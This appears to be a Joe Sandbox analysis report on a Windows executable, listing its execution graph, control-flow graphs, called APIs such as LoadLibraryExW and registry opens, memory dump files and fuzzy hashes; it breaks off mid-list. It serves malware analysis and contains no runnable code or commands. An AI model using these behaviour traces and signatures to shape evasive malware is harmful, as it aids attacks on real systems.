                                                                                                                          execution_graph 21377 b0d110 21379 b0d119 21377->21379 21378 b0d2ee ExitProcess 21379->21378 21393 b460d2 21395 b460fa 21393->21395 21394 b4614e 21398 b45bb0 LdrInitializeThunk 21394->21398 21395->21394 21399 b45bb0 LdrInitializeThunk 21395->21399 21398->21394 21399->21394 21400 b4673d 21402 b466aa 21400->21402 21401 b46793 21402->21401 21405 b45bb0 LdrInitializeThunk 21402->21405 21404 b467b3 21405->21404 21406 b1049b 21410 b10227 21406->21410 21407 b10455 21413 b45700 RtlFreeHeap 21407->21413 21410->21407 21411 b10308 21410->21411 21412 b45700 RtlFreeHeap 21410->21412 21412->21407 21413->21411 21414 b464b8 21416 b463f2 21414->21416 21415 b4646e 21416->21415 21418 b45bb0 LdrInitializeThunk 21416->21418 21418->21415 21419 b450fa 21420 b45176 LoadLibraryExW 21419->21420 21421 b4514c 21419->21421 21422 b4518c 21420->21422 21421->21420 21423 b4695b 21424 b46965 21423->21424 21424->21424 21425 b46a5e 21424->21425 21427 b45bb0 LdrInitializeThunk 21424->21427 21427->21425 21428 b0fca0 21431 b0fcdc 21428->21431 21429 b0ffe4 21431->21429 21432 b43220 21431->21432 21433 b43236 21432->21433 21434 b432a2 RtlFreeHeap 21432->21434 21435 b432ac 21432->21435 21433->21434 21434->21435 21435->21429 21436 ce6858 21437 ce7db3 21436->21437 21438 ce7ddd RegOpenKeyA 21437->21438 21439 ce7e04 RegOpenKeyA 21437->21439 21438->21439 21440 ce7dfa 21438->21440 21441 ce7e21 21439->21441 21440->21439 21442 ce7e65 GetNativeSystemInfo 21441->21442 21443 ce4179 21441->21443 21442->21443 21444 b43202 RtlAllocateHeap 21445 b3d9cb 21447 b3d9fb 21445->21447 21446 b3da65 21447->21446 21449 b45bb0 LdrInitializeThunk 21447->21449 21449->21447 21450 b4626a 21452 b4628d 21450->21452 21451 b4636e 21454 b462de 21452->21454 21457 b45bb0 LdrInitializeThunk 21452->21457 21454->21451 21456 b45bb0 LdrInitializeThunk 21454->21456 21456->21451 21457->21454

                                                                                                                          Executed Functions

                                                                                                                          Function 00B450FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 25 b450fa-b4514a 26 b45176-b45186 LoadLibraryExW 25->26 27 b4514c-b4514f 25->27 29 b4518c-b451b5 26->29 30 b452d8-b45304 26->30 28 b45150-b45174 call b45a50 27->28 28->26 29->30
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00B45182
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: <I$)$<I$)$@^
                                                                                                                          • API String ID: 1029625771-935358343
                                                                                                                          • Opcode ID: 45ee30d751013ca3138927022ccfe4bf0156345a3ac2cb68dda0d64ecadd98fd
                                                                                                                          • Instruction ID: 45a9f3f238dd1d6da41792f223cbf454f922d476d5f95e4781e0ad3af03c62e3
                                                                                                                          • Opcode Fuzzy Hash: 45ee30d751013ca3138927022ccfe4bf0156345a3ac2cb68dda0d64ecadd98fd
                                                                                                                          • Instruction Fuzzy Hash: 5121AE351083848FC300DF68D89072AB7F4AB6A341F69486CE1C5D7362DB76DA15CB56
                                                                                                                          Function 00B0FCA0 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 33 b0fca0-b0fcda 34 b0fd0b-b0fe22 33->34 35 b0fcdc-b0fcdf 33->35 37 b0fe24 34->37 38 b0fe5b-b0fe8c 34->38 36 b0fce0-b0fd09 call b12690 35->36 36->34 42 b0fe30-b0fe59 call b12760 37->42 39 b0feb6-b0fecf call b10b50 38->39 40 b0fe8e-b0fe8f 38->40 51 b0ffe4-b0ffe6 39->51 52 b0fed5-b0fef8 39->52 44 b0fe90-b0feb4 call b12700 40->44 42->38 44->39 53 b101b1-b101bb 51->53 54 b0fefa 52->54 55 b0ff2b-b0ff2d 52->55 57 b0ff00-b0ff29 call b127e0 54->57 56 b0ff30-b0ff3a 55->56 58 b0ff41-b0ff49 56->58 59 b0ff3c-b0ff3f 56->59 57->55 61 b101a2-b101a5 call b43220 58->61 62 b0ff4f-b0ff76 58->62 59->56 59->58 70 b101aa-b101ad 61->70 64 b0ff78 62->64 65 b0ffab-b0ffb5 62->65 67 b0ff80-b0ffa9 call b12840 64->67 68 b0ffb7-b0ffbb 65->68 69 b0ffeb 65->69 67->65 73 b0ffc7-b0ffcb 68->73 71 b0ffed-b0ffef 69->71 70->53 74 b0fff5-b1002c 71->74 75 b1019a 71->75 73->75 77 b0ffd1-b0ffd8 73->77 78 b1005b-b10065 74->78 79 b1002e-b1002f 74->79 75->61 80 b0ffda-b0ffdc 77->80 81 b0ffde 77->81 83 b100a4 78->83 84 b10067-b1006f 78->84 82 b10030-b10059 call b128a0 79->82 80->81 85 b0ffc0-b0ffc5 81->85 86 b0ffe0-b0ffe2 81->86 82->78 87 b100a6-b100a8 83->87 89 b10087-b1008b 84->89 85->71 85->73 86->85 87->75 90 b100ae-b100c5 87->90 89->75 92 b10091-b10098 89->92 93 b100c7 90->93 94 b100fb-b10102 90->94 95 b1009a-b1009c 92->95 96 b1009e 92->96 97 b100d0-b100f9 call b12900 93->97 98 b10130-b1013c 94->98 99 b10104-b1010d 94->99 95->96 100 b10080-b10085 96->100 101 b100a0-b100a2 96->101 97->94 102 b101c2-b101c7 98->102 104 b10117-b1011b 99->104 100->87 100->89 101->100 102->61 104->75 106 b1011d-b10124 104->106 107 b10126-b10128 106->107 108 b1012a 106->108 107->108 109 b10110-b10115 108->109 110 b1012c-b1012e 108->110 109->104 111 b10141-b10143 109->111 110->109 111->75 112 b10145-b1015b 111->112 112->102 113 b1015d-b1015f 112->113 114 b10163-b10166 113->114 115 b10168-b10188 call b12030 114->115 116 b101bc 114->116 119 b10192-b10198 115->119 120 b1018a-b10190 115->120 116->102 119->102 120->114 120->119
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: J|BJ$V$VY^_$t
                                                                                                                          • API String ID: 0-3701112211
                                                                                                                          • Opcode ID: 34073cff1e4663f458dcad37a2cd21b9ebd31e8fe939b53756cdc823c4f8968a
                                                                                                                          • Instruction ID: cc2fe6a5cfc80403d88abf6b9b28de99acbe1abcfae69b667efdc63e672322ba
                                                                                                                          • Opcode Fuzzy Hash: 34073cff1e4663f458dcad37a2cd21b9ebd31e8fe939b53756cdc823c4f8968a
                                                                                                                          • Instruction Fuzzy Hash: C2D1B97060C381ABD321EF14849466FBBE1EB96B44F5448ACF4C89B252C375CD89DB92
                                                                                                                          Function 00B0D110 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 182 b0d110-b0d11b call b44cc0 185 b0d121-b0d130 call b3c8d0 182->185 186 b0d2ee-b0d2f6 ExitProcess 182->186 190 b0d136-b0d15f 185->190 191 b0d2e9 call b456e0 185->191 195 b0d161 190->195 196 b0d196-b0d1bf 190->196 191->186 197 b0d170-b0d194 call b0d300 195->197 198 b0d1c1 196->198 199 b0d1f6-b0d20c 196->199 197->196 201 b0d1d0-b0d1f4 call b0d370 198->201 202 b0d239-b0d23b 199->202 203 b0d20e-b0d20f 199->203 201->199 204 b0d286-b0d2aa 202->204 205 b0d23d-b0d25a 202->205 208 b0d210-b0d237 call b0d3e0 203->208 210 b0d2d6 call b0e8f0 204->210 211 b0d2ac-b0d2af 204->211 205->204 209 b0d25c-b0d25f 205->209 208->202 215 b0d260-b0d284 call b0d440 209->215 220 b0d2db-b0d2dd 210->220 216 b0d2b0-b0d2d4 call b0d490 211->216 215->204 216->210 220->191 223 b0d2df-b0d2e4 call b12f10 call b10b40 220->223 223->191
                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00B0D2F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 4cbe6a6742fc7264184c007642229f4fe2135492bf216b48499146cceb10514f
                                                                                                                          • Instruction ID: 5deed308762486e8c1037a50d6f9ba9a1890c54ed7bb19b055e88dec829ec448
                                                                                                                          • Opcode Fuzzy Hash: 4cbe6a6742fc7264184c007642229f4fe2135492bf216b48499146cceb10514f
                                                                                                                          • Instruction Fuzzy Hash: BC41227450D380ABC301ABA8D594A2EFFF5EF92704F548C8CE5C49B292C736D8549B6B
                                                                                                                          Function 00B45BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 237 b45bb0-b45be2 LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          • LdrInitializeThunk.NTDLL(00B4973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00B45BDE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                          Function 00B4695B Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 266 b4695b-b4696b call b44a20 269 b46981-b46a02 266->269 270 b4696d 266->270 272 b46a04 269->272 273 b46a36-b46a42 269->273 271 b46970-b4697f 270->271 271->269 271->271 274 b46a10-b46a34 call b473e0 272->274 275 b46a44-b46a4f 273->275 276 b46a85-b46a9f 273->276 274->273 278 b46a50-b46a57 275->278 280 b46a60-b46a66 278->280 281 b46a59-b46a5c 278->281 280->276 283 b46a68-b46a7d call b45bb0 280->283 281->278 282 b46a5e 281->282 282->276 285 b46a82 283->285 285->276
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 2f66bd4330145202d38cc347a60ec3146cd307efa0886b6ccc76b0fa4931e4d5
                                                                                                                          • Instruction ID: a86ac4c2eaa231e7302486d48f00332f90ddc014e002444fd84e519db1da1e93
                                                                                                                          • Opcode Fuzzy Hash: 2f66bd4330145202d38cc347a60ec3146cd307efa0886b6ccc76b0fa4931e4d5
                                                                                                                          • Instruction Fuzzy Hash: 4B31A8B16183019FD718DF18C8A072AB7F1FF8A345F48989CE5C6972A1E7349A04DB56
                                                                                                                          Function 00B1049B Relevance: .3, Instructions: 264COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 286 b1049b-b10515 call b0c9f0 290 b10311-b10320 286->290 291 b10370-b1037e 286->291 292 b103d0-b103d7 286->292 293 b10393-b10397 286->293 294 b10472-b10477 286->294 295 b10417-b10430 286->295 296 b10356 286->296 297 b10339-b1034f 286->297 298 b1045b-b10469 call b45700 286->298 299 b103fb-b10414 286->299 300 b1051c-b1051e 286->300 301 b1035f-b10367 286->301 302 b103be 286->302 303 b103de-b103e3 286->303 304 b10440-b10458 call b45700 286->304 305 b10480 286->305 306 b10242-b10244 286->306 307 b10482-b10484 286->307 308 b10227-b1023b 286->308 309 b10246-b10260 286->309 310 b10386-b1038c 286->310 311 b10308-b1030c 286->311 312 b103ec-b103f4 286->312 327 b10327-b10332 290->327 291->310 292->293 292->294 292->295 292->299 292->303 292->305 292->307 292->310 292->312 320 b103a0-b103b7 293->320 294->305 295->304 296->301 297->291 297->292 297->293 297->294 297->295 297->296 297->298 297->299 297->301 297->302 297->303 297->304 297->305 297->307 297->310 297->312 298->294 299->295 319 b10520 300->319 301->291 302->292 303->312 304->298 313 b10296-b102bd 306->313 317 b1048d-b10496 307->317 308->290 308->291 308->292 308->293 308->294 308->295 308->296 308->297 308->298 308->299 308->301 308->302 308->303 308->304 308->305 308->306 308->307 308->309 308->310 308->311 308->312 314 b10262 309->314 315 b10294 309->315 310->293 310->294 310->305 310->307 311->317 312->293 312->294 312->299 312->305 312->307 322 b102ea-b10301 313->322 323 b102bf 313->323 321 b10270-b10292 call b12eb0 314->321 315->313 317->319 330 b10529-b10b30 319->330 320->292 320->293 320->294 320->295 320->298 320->299 320->302 320->303 320->304 320->305 320->307 320->310 320->312 321->315 322->290 322->291 322->292 322->293 322->294 322->295 322->296 322->297 322->298 322->299 322->301 322->302 322->303 322->304 322->305 322->307 322->310 322->311 322->312 332 b102c0-b102e8 call b12e70 323->332 327->291 327->292 327->293 327->294 327->295 327->296 327->297 327->298 327->299 327->301 327->302 327->303 327->304 327->305 327->307 327->310 327->312 332->322
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: db2425994fd6b00b1b3f6e22cd0f9768ae9ccdc3d208d1555bb99cb6717eea85
                                                                                                                          • Instruction ID: 0d1bfaf9194622086b24ab60a66d0552315300777453b31cc2982c8c6bcea8b7
                                                                                                                          • Opcode Fuzzy Hash: db2425994fd6b00b1b3f6e22cd0f9768ae9ccdc3d208d1555bb99cb6717eea85
                                                                                                                          • Instruction Fuzzy Hash: 25918A75200B01CFD724CF25D890A27B7F6FF89315B118AACE8568BBA1DB70E855CB90
                                                                                                                          Function 00B10228 Relevance: .2, Instructions: 218COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d946e5daa4bac24b7522cae8c14418c734d119015ada006022733e92982cb33e
                                                                                                                          • Instruction ID: 7113f3ca348a25e987d0899b2fe97572d7ea36db903f4456ade50f9f30283272
                                                                                                                          • Opcode Fuzzy Hash: d946e5daa4bac24b7522cae8c14418c734d119015ada006022733e92982cb33e
                                                                                                                          • Instruction Fuzzy Hash: 24717A78200701DFD7248F20E894B27B7F6FF8A315F1089ACE8568B662DB71A955CB60
                                                                                                                          Function 00B499D0 Relevance: .1, Instructions: 143COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c507934c0ae566244c4ddca5faf9ba95c63cfd91d98d4367d23fc0dbdfeed80c
                                                                                                                          • Instruction ID: 80e94340ee9679533c10412e66e156e6771c246fe9a214e1aaa5f30b52395607
                                                                                                                          • Opcode Fuzzy Hash: c507934c0ae566244c4ddca5faf9ba95c63cfd91d98d4367d23fc0dbdfeed80c
                                                                                                                          • Instruction Fuzzy Hash: 18418134248300ABDB24DF15D990B2BF7E5EB85715F5488ACF5CA97251D331ED01EB62
                                                                                                                          Function 00B463B8 Relevance: .1, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 47c7aef71044de2d2d6ac0614323faefd5fccdb4c90dc2822a257907533b659d
                                                                                                                          • Instruction ID: c424cba9450e4ba77e988c51c63f5a97a7f3a5b0ed9e73d3792b3fa9af0f6a89
                                                                                                                          • Opcode Fuzzy Hash: 47c7aef71044de2d2d6ac0614323faefd5fccdb4c90dc2822a257907533b659d
                                                                                                                          • Instruction Fuzzy Hash: BF31F270249301BBDA24DB08CD82F3AB7E1EB86B52F64894CF1C15B2E1D770AD119B56
                                                                                                                          Function 00B10EEC Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
